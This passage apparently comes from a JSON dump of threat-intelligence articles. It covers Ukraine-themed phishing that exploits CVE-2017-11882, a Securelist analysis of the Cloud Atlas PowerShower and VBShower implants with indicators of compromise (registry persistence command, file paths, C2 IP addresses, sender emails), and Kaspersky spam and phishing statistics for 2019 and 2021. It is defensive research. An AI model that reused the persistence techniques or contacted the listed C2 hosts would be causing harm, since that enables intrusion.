The attack sequence, in this case, employs a weaponized document that exploits the Equation Editor flaw in Microsoft Office ([CVE-2017-11882](<https://thehackernews.com/2021/10/lone-wolf-hacker-group-targeting.html>)) to distribute an information stealing malware.\n\nThe findings echo similar warnings from Google's Threat Analysis Group (TAG), which [disclosed](<https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html>) that nation-state-backed threat groups from Iran, China, North Korea, and Russia and numerous other criminal and financially motivated actors are leveraging war-related themes in phishing campaigns, online extortion attempts, and other malicious activities.\n\n\"Although the attention of the public does not usually linger on a single issue for an extended period, the Russian-Ukrainian war is an obvious exception,\" the Israeli company said. \"This war affects multiple regions around the world and has potentially far-reaching ramifications. As a result, we can expect that APT threat actors will continue to use this crisis to conduct targeted phishing campaigns for espionage purposes.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-04T11:13:00", "type": "thn", "title": "Multiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-04-05T03:13:43", "id": "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "href": "https://thehackernews.com/2022/04/multiple-hacker-groups-capitalizing-on.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. 
We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victim - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain relying no more on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower ;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique by victim so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy of the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and then, every hour, tries to fetch a VBS script over HTTP from the remote server and execute it.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor, which communicates with a cloud storage service via WebDAV.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. 
Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. 
Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. 
Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). 
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. 
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. 
The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). 
The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. 
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. 
against Q4 last year to 25.78%.

_Distribution of organizations subjected to phishing attacks by category, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).

## Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

_Source: Securelist, "Spam and phishing in Q1 2019", published 2019-05-15, <https://securelist.com/spam-and-phishing-in-q1-2019/90795/>. CVEs mentioned: CVE-2017-11882, CVE-2018-0802._

# Spam and phishing in 2021

## Figures of the year

In 2021:

 * 45.56% of e-mails were spam
 * 24.77% of spam was sent from Russia with another 14.12% from Germany
 * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
 * The most common malware family found in attachments was the Agensla Trojan family
 * Our Anti-Phishing system
blocked 253 365 212 phishing links
 * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers

## Trends of the year

### How to make an unprofitable investment with no return

The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)

Similar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)

Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as.
In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)

### Films and events "streamed" on fake sites: not seeing is believing!

Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)

However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content; the only difference was that visitors might not be able to watch anything without registering. Either way, the registration was no longer free.
The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)

### A special offer from cybercriminals: try your hand at spamming

More and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)

### Hurry up and lose your account: phishing in the corporate sector

The main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details.
That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)

The fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)

Another noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)

### COVID-19

#### Scams

The subject of COVID-19, which dominated newsfeeds throughout the entire year, was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals.
The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)

#### The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)

Another malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result".
Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)

The "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment with the malicious object as quickly as possible.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)

#### COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)

In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details.
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)

Another way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)

The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)

